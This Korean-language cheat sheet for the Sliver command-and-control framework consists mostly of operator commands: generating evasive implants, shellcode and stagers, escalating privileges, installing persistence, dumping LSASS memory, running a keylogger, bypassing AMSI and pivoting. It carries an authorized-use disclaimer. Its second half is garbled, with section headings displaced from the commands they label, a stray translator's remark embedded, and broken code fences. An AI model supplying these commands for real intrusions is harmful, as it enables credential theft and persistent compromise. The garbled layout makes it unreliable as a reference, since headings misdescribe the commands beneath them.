Sliver C2 프레임워크 치트 시트

개요

Sliver는 Cobalt Strike의 대안으로 설계된 현대적이고 오픈 소스인 크로스 플랫폼 적대적 에뮬레이션/레드팀 프레임워크입니다. 여러 플랫폼, 회피성 통신, 팀 기반 작전을 지원하는 고급 명령 및 제어 기능을 제공합니다.

⚠️ 경고: 이 도구는 승인된 침투 테스트 및 레드팀 연습용으로만 사용됩니다. 모든 환경에서 사용하기 전에 적절한 승인을 받았는지 확인하세요.

설치

사전 컴파일된 바이너리 (권장)

# Download latest release for Linux
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux -o sliver-server
chmod +x sliver-server

# Download latest release for macOS
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_macos -o sliver-server
chmod +x sliver-server

# Download latest release for Windows
# Download sliver-server_windows.exe from GitHub releases

소스에서 빌드

# Install Go (version 1.19+)
git clone https://github.com/BishopFox/sliver.git
cd sliver
make

Docker 설치

# Pull official Docker image
docker pull bishopfox/sliver

# Run Sliver server in Docker
docker run -it -p 31337:31337 -p 8080:8080 bishopfox/sliver

기본 사용법

Sliver 서버 시작

# Start the server (first run will generate certificates)
./sliver-server

# Start server with custom configuration
./sliver-server -c /path/to/config.json

# Start server in daemon mode
./sliver-server daemon

클라이언트 연결

# Connect to local server
./sliver-client

# Connect to remote server
./sliver-client -c /path/to/client.cfg

# Generate new client configuration
./sliver-server operator --name username --lhost server-ip

명령 참조

서버 관리

명령어	설명
`help`	도움말 정보 표시
`version`	버전 정보 표시
`operators`	연결된 연산자 목록
`kick-operator <name>`	운영자 연결 해제
`armory`	Sliver 무기고(확장 기능)에 접근

리스너 관리

명령어	설명
`mtls`	mTLS 리스너 시작
`wg`	WireGuard 리스너 시작
`http`	HTTP 리스너 시작
`https`	HTTPS 리스너 시작
`dns`	DNS 리스너 시작
`jobs`	활성 리스너 목록
`jobs -k <id>`	리스너 제거하기

임플란트 생성

명령어	설명
`generate`	임플란트 생성
`generate --mtls <host:port>`	mTLS 임플란트 생성
`generate --http <url>`	HTTP 임플란트 생성
`generate --dns <domain>`	DNS 임플란트 생성
`profiles`	임플란트 프로필 목록
`profiles new <name>`	새 프로필 생성

세션 관리

명령어	설명
`sessions`	활성 세션 목록
`use <session-id>`	세션과 상호작용하기
`background`	현재 세션 배경
`sessions -k <id>`	세션 종료
`sessions -K`	모든 세션 종료

리스너 설정

mTLS 리스너 (권장)

# Start mTLS listener on default port (8888)
mtls

# Start mTLS listener on custom port
mtls -l 443

# Start mTLS listener with custom interface
mtls -l 0.0.0.0:8888

HTTP/HTTPS 리스너

# Start HTTP listener
http -l 80

# Start HTTPS listener with custom certificate
https -l 443 -c /path/to/cert.pem -k /path/to/key.pem

# Start HTTP listener with custom domain
http -l 80 -d example.com

DNS 리스너

# Start DNS listener
dns -d example.com

# Start DNS listener with custom nameserver
dns -d example.com -l 53

WireGuard 리스너

# Start WireGuard listener
wg -l 53

# Start WireGuard listener with custom key port
wg -l 53 -x 1234

임플란트 생성

기본 임플란트 생성

# Generate Windows executable
generate --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe

# Generate Linux ELF binary
generate --mtls 192.168.1.100:8888 --os linux --arch amd64 --format elf

# Generate macOS binary
generate --mtls 192.168.1.100:8888 --os darwin --arch amd64 --format macho

고급 임플란트 옵션

# Generate with custom name and save location
generate --mtls 192.168.1.100:8888 --os windows --save /tmp/implant.exe --name MyImplant

# Generate with evasion features
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols

# Generate shellcode
generate --mtls 192.168.1.100:8888 --os windows --format shellcode

# Generate shared library
generate --mtls 192.168.1.100:8888 --os linux --format shared

스테이지드 페이로드

# Generate staged payload
generate --mtls 192.168.1.100:8888 --os windows --format exe --strategy staged

# Generate stager
generate stager --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe

세션 상호작용

기본 세션 명령

# Get system information
info

# Get current user
whoami

# Get current working directory
pwd

# List files and directories
ls

# Change directory
cd /path/to/directory

# Download file
download /remote/path/file.txt

# Upload file
upload /local/path/file.txt /remote/path/

프로세스 관리

# List processes
ps

# Get current process info
getpid

# Migrate to another process
migrate <pid>

# Execute command
execute <command>

# Start interactive shell
shell

# Terminate process
terminate <pid>

네트워크 작업

The translation preserves the structure, markdown formatting, and keeps technical terms in English as requested.```bash

Get network interfaces

ifconfig

Get network connections

netstat

Port forward

portfwd add —bind 127.0.0.1:8080 —remote 192.168.1.10:80

List port forwards

portfwd

Remove port forward

portfwd rm —id

SOCKS proxy

socks5 start

Stop SOCKS proxy

socks5 stop

```bash
# Get current privileges
getprivs

# Attempt privilege escalation
getsystem

# Run as different user
runas -u username -p password <command>

# Impersonate token
impersonate <token-id>

# Revert to self
rev2self
```### 지속성
```bash
# Install service persistence
persistence service --name ServiceName --path /path/to/implant.exe

# Install registry persistence
persistence registry --hive HKCU --path "Software\\Microsoft\\Windows\\CurrentVersion\\Run" --key "MyApp"

# Remove persistence
persistence remove --id <persistence-id>
```## 고급 기능
```bash
# Generate pivot listener
pivots tcp --bind 0.0.0.0:9999

# Connect through pivot
generate --mtls pivot-host:9999 --os windows

# List active pivots
pivots

# Stop pivot
pivots --id <id> stop
```### 피벗 및 측면 이동
```bash
# Dump process memory
procdump -p <pid> -s /tmp/dump.dmp

# Dump LSASS
procdump -n lsass.exe -s /tmp/lsass.dmp

# Screenshot
screenshot

# Keylogger
keylogger start
keylogger dump
keylogger stop
```### 자격 증명 수집
```bash
# Process hollowing
execute-assembly --process notepad.exe /path/to/assembly.exe

# In-memory .NET assembly execution
execute-assembly /path/to/assembly.exe

# PowerShell execution
powershell -c "Get-Process"

# Bypass AMSI
armory install bypass-amsi
```### 회피 기술
```bash
# Create new implant profile
profiles new windows-profile --mtls 192.168.1.100:8888 --os windows --arch amd64

# Generate from profile
generate --profile windows-profile

# List profiles
profiles

# Delete profile
profiles rm windows-profile
```## 프로필 및 템플릿
```bash
# HTTP C2 profile with custom headers
http --lhost 0.0.0.0 --lport 80 --website /path/to/website

# HTTPS with custom certificate
https --cert /path/to/cert.pem --key /path/to/key.pem --lhost 0.0.0.0 --lport 443
```### 프로필 생성
```bash
# Update armory
armory update

# Install extension
armory install <extension-name>

# List available extensions
armory

# List installed extensions
armory installed
```### C2 프로필 사용자 정의
```bash
# Process injection techniques
armory install process-injection

# Credential dumping
armory install credman

# Registry operations
armory install registry

# WMI operations
armory install wmi
```## 아머리 확장
```bash
# Generate operator config
./sliver-server operator --name operator1 --lhost server-ip --save operator1.cfg

# Connect as operator
./sliver-client -c operator1.cfg

# List connected operators
operators

# Send message to operators
msg "Hello team!"
```### 확장 설치
```bash
# Share session with team
sessions -i <session-id> --shared

# Take control of shared session
use <session-id>
```### 인기 확장
```bash
# Check listener status
jobs

# Restart listener
jobs -k <listener-id>
mtls -l 8888

# Check firewall rules
# Ensure ports are open on server
```## 팀 작업
```bash
# Use evasion options
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols --debug

# Try different communication protocols
generate --dns example.com --os windows

# Use staged payloads
generate stager --mtls 192.168.1.100:8888 --os windows
```### 다중 운영자 설정
```bash
# Adjust beacon interval
use <session-id>
reconfig --beacon-interval 60s

# Use compression
reconfig --compress
```### 세션 공유
```bash
# Enable debug mode
./sliver-server --debug

# Check logs
tail -f ~/.sliver/logs/sliver.log

# Verbose client output
./sliver-client --debug
```## 문제 해결
https://sliver.sh/docs##

# 일반적인 문제
https://github.com/BishopFox/sliver###

# 연결 문제
https://bishopfox.com/blog###

# 임플란트 탐지
https://github.com/BishopFox/sliver/wiki###

# 성능 문제
https://redteamvillage.io/*이 치트 시트는 Sliver C2 프레임워크 사용에 대한 포괄적인 참조를 제공합니다. 항상 이 도구를 어떤 환경에서 사용하기 전에 적절한 승인을 받았는지 확인하세요.*